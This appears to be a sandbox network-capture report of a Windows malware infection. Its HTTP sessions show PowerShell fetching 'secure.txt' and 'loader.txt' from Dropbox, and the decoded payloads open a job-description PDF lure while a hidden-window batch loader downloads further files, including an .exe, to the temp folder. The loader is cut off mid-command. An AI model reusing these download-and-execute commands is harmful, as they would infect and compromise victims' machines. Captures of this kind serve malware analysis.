                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:13 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: media-src https://* blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfgui [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.com/cd/0/get/CgjJ1hn5AQ9QSDUUYQYY62v9V2E1KCzIWtVlBlXzGQOSQhhkJgjnHskltQzGu7DOvXvcGlymKFm1p0-r-Uh5NHAfhfXP1XVTdTkB4S5UPaso_T6uLMIJjNUeZQQjp6FfUTakNkhy8Oe4tqbUL4XV5wA5/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=OTEyNzQ5MDA2NzE5OTk4MjU0NzMwOTgyNDQ3NTE3NTA4NTIzNzg=; Path=/; Expires=Tue, 18 Dec 2029 12:44:13 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=dsCIUQAKtr-h1P5DsRKplfNJ; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:13 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=dsCIUQAKtr-h1P5DsRKplfNJ; Path=/; Expires=Fri, 19 Dec 2025 12:44:13 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=m1oKLCPh4g; Path=/; Expires=Fri, 19 Dec 2025 12:44:13 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:13 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:13 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: a6f11787da414835800251ea338b635a
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:13 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  2192.168.2.549706162.125.69.154431440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:15 UTC370OUTGET /cd/0/get/CgjJ1hn5AQ9QSDUUYQYY62v9V2E1KCzIWtVlBlXzGQOSQhhkJgjnHskltQzGu7DOvXvcGlymKFm1p0-r-Uh5NHAfhfXP1XVTdTkB4S5UPaso_T6uLMIJjNUeZQQjp6FfUTakNkhy8Oe4tqbUL4XV5wA5/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt
                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  Etag: 1734504836045894d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 162
                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:16 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 453
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 52e0ba339094451188cb479f1a926a76
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC453INData Raw: 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 6d 73 65 64 67 65 2e 65 78 65 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 2d 6b 69 6f 73 6b 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 7a 73 77 77 6f 7a 31 6e 73 73 68 66 64 68 62 67 64 69 39 64 79 2f 44 6f 63 75 6d 65 6e 74 73 2d 61 62 6f 75 74 2d 63 6f 6d 70 61 6e 79 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 61 6e 64 2d 6a 6f 62 2d 64 65 73 63 72 69 70 74 69 6f 6e 73 2d 34 2e 70 64 66 3f 72 6c 6b 65 79 3d 78 62 34 7a 34 62 39 71 6c 6a 65 70 6e 70 69 75 35 6d 6b 6a 7a 38 38 38 71 26 64 6c 3d 31 22 3b 20 24 52 61 6e 64 6f 6d 46 69 6c 65 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 62 61 74 22 3b 20 49 57 52
                                                                                                                                                                                                                                                                  Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  3192.168.2.549715162.125.69.184431440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC212OUTGET /scl/fi/9t9vl9gk9xm4lc1q5j1w2/loader.txt?rlkey=2k6bvt9zpjr10kshfjrooidha&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  2024-12-19 12:44:21 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.googl [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com/cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fFUSV6yfl1fVPALsgIyBLD-Igcn_WbMjaptVHUVi6RfgH6L8mvWvrlXhKTwOpejp4UjibsUygAgl_i1i781Bq-uvOrrU8JEjSqUwroR1hYnopddQqUykH7z0bQcW69/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=NTExMTYyNTIzNzE2ODI4NDA0NDEwODE0OTA2NDcwMDk0MDg0NDY=; Path=/; Expires=Tue, 18 Dec 2029 12:44:21 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=hT85ypcvZ4mBC6YSF4e76SOU; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:21 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=hT85ypcvZ4mBC6YSF4e76SOU; Path=/; Expires=Fri, 19 Dec 2025 12:44:21 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=D-rDzL6SbQ; Path=/; Expires=Fri, 19 Dec 2025 12:44:21 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:21 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:21 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 5f85e34479cb44a381fdc83606eb5d54
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:21 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  4192.168.2.549727162.125.69.184437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:23 UTC806OUTGET /scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                  2024-12-19 12:44:24 UTC4094INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: base-uri 'self' ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/reca [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com/cd/0/get/CgidpJ0z5-TTxaxwLVGbwLHcILPhiEAceFC0CmgD2QIinNxPiiy5PfY_e4_IpbzPv2Q77V5r-4-wuTgCF2LHBluwi4rBDQP-ueVFLNoUgM8EOR3utRtHf-RZXl8S-km9K1Z3xGOqYyP0WjCqAM_L0Rfy/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MTM3MTI5MTUzMzAzNTY2MzUyMzE5NDI4OTA4OTYwNDQ3Njg5MDg3; Path=/; Expires=Tue, 18 Dec 2029 12:44:23 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=QgkzLwfZznI-Rvq60t8S9ERY; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:23 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=QgkzLwfZznI-Rvq60t8S9ERY; Path=/; Expires=Fri, 19 Dec 2025 12:44:23 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=YGf9sLWAjI; Path=/; Expires=Fri, 19 Dec 2025 12:44:23 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:23 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:24 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 6eaab296271a4abfac40423f0d71ebf0
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:24 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  5192.168.2.549729162.125.69.154431440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:23 UTC370OUTGET /cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fFUSV6yfl1fVPALsgIyBLD-Igcn_WbMjaptVHUVi6RfgH6L8mvWvrlXhKTwOpejp4UjibsUygAgl_i1i781Bq-uvOrrU8JEjSqUwroR1hYnopddQqUykH7z0bQcW69/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:24 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt
                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  Etag: 1734504833956208d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 167
                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:23 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 839
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 3232ecfc720a47ed99386449a0e1fa6c
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:24 UTC839INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 49 6e 64 6f 57 53 74 59 4c 65 20 68 69 44 64 65 4e 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 43 6f 6d 6d 61 6e 64 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 2d 43 68 69 6c 64 50 61 74 68 20 28 27 7b 30 7d 2e 70 64 66 27 20 2d 66 20 28 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 29 29 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 2d 43 68 69 6c 64 50 61 74 68 20 28 27 7b 30 7d 2e 65 78 65 27 20 2d 66 20 28 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 29 29 3b 20 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55
                                                                                                                                                                                                                                                                  Data Ascii: @echo offpowershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -U


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  6192.168.2.549743162.125.65.154437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:26 UTC888OUTGET /cd/0/get/CgidpJ0z5-TTxaxwLVGbwLHcILPhiEAceFC0CmgD2QIinNxPiiy5PfY_e4_IpbzPv2Q77V5r-4-wuTgCF2LHBluwi4rBDQP-ueVFLNoUgM8EOR3utRtHf-RZXl8S-km9K1Z3xGOqYyP0WjCqAM_L0Rfy/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="Documents about company information and job descriptions (4).pdf"; filename*=UTF-8''Documents%20about%20company%20information%20and%20job%20descriptions%20%284%29.pdf
                                                                                                                                                                                                                                                                  Etag: 1734504831869583d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 182
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:26 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 656088
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 835331bd5f844abc96a3684055c6298d
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC15614INData Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23 88 a0 b3 a4 41 52 90 78 e0 c2 c7 e1 c0 bd f7 40 ae 00 90 97 a0 3f 88 c2 46 dd 10 5b 56 5b 9c 7f 47 40 60 2a db 1d 05 64 4b 80 ef 97 24 fb bc f5 4f 2e 4b 0b 1d 6f e4 02 1f 40 14 b6 ac 36 08 1d 60 cd 4f f8 2c 66 27 e1 cb 98 4f a3 20 02 61 12 73 78 d0 30 41 b8 03 36 fd 19 76 66 d8 0d c2 38 ff 06 ec f4 7b 63 37 bd 9b 25 6f 70 d8 04 5a c0 3a 75 86 0c f1 e9 e1
                                                                                                                                                                                                                                                                  Data Ascii: %PDF-1.7%18 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#ARx@?F[V[G@`*dK$O.Ko@6`O,f'O asx0A6vf8{c7%opZ:u
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC16384INData Raw: d7 89 da 24 e2 8b 14 92 13 3b 54 4c a2 3d 9b b4 9b 56 70 94 3b a4 a0 9a 08 ba fa 92 7e 9a 5e fe 84 c6 71 1d 91 0f e6 19 fd 59 f1 36 df 82 1f e2 46 4a be 29 2b 0e 60 bc 93 81 2e 0b 80 9e 3c 57 c4 1c af 36 f6 a5 b3 27 33 a6 1c 38 bd ba 80 5e 5d 30 28 57 28 4b d1 df b8 9a 34 f1 d8 a5 cf b5 e1 32 b6 59 07 e1 ee b0 f4 4c 72 cf 9a c8 4d 0a 5e d6 b7 53 f6 05 40 66 85 fe ff db ff 83 8d 57 dc 4c a4 03 28 e0 c5 af c4 97 55 ea 90 9f 16 67 64 f9 3e 87 a2 0b 33 7e 5b a2 eb 6b 6f 94 6a aa 22 fd be b8 a9 bf 4a 24 ef b2 d7 cd 53 0f 54 88 03 f3 33 f6 22 95 e7 af b2 d4 b7 de 78 d8 3a 52 a5 16 4d 8a 00 5c 45 21 56 4e eb f8 61 df 5b 52 d7 16 b4 87 cd 5f 6b be a5 4b e5 69 62 bb b7 96 57 74 55 5c 82 28 8f eb 68 05 ae 79 06 04 c3 50 67 31 53 44 b1 ce aa 7d 8f 42 d2 e5 c4 27 8c
                                                                                                                                                                                                                                                                  Data Ascii: $;TL=Vp;~^qY6FJ)+`.<W6'38^]0(W(K42YLrM^S@fWL(Ugd>3~[koj"J$ST3"x:RM\E!VNa[R_kKibWtU\(hyPg1SD}B'
